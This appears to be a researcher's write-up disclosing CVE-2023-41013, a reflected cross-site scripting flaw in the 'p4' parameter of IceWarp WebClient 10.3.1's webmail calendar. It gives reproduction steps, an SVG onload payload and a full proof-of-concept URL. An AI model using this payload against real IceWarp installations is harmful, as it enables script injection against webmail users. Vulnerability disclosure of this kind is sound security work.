CVE-2023–41013
Introduction
This article is a write up on how I found Cross Site Scripting (Reflected-XSS) in Webmail Calender in IceWarp WebClient which gave me a new CVE-2023–41013.
What is Cross Site Scripting (XSS) ?
Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same-origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform and to access any of the user’s data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application’s functionality and data.
Vulnerability exploitation
Found this vulnerability in Webmail Calender in IceWarp WebClient 10.3.1 allows remote attackers to inject arbitrary web script or HTML via the “p4” field.
- So first we need to go to
http://example.com/webmail/calendar/index.html
2. Enter any random username and click on go and we will be redirected to Webmail Calendar.
Now add any random string and click on search,
We will be redirected to POC URL,
http://example.com/webmail/calendar/index.html?_l=folder&p0=main&p1=content&p2=event.main&p3=item.fdr&p4=<<Vulnerable>>&p5=E&view=event.list&_s[search]=batman&_s[page]=1
Here we have “p4” parameter which is vulnerable to Cross site scripting,
Payload:
“/><svg/onload=confirm`1`>
Now final POC URL will be,
http://example.com/webmail/calendar/index.html?_l=folder&p0=main&p1=content&p2=event.main&p3=item.fdr&p4=%22/%3E%3Csvg/onload=confirm`1`%3E&p5=E&view=event.list&_s[search]=batman&_s[page]=1
As observed in the above screenshot, the malicious code is executed.
Thanks for Reading!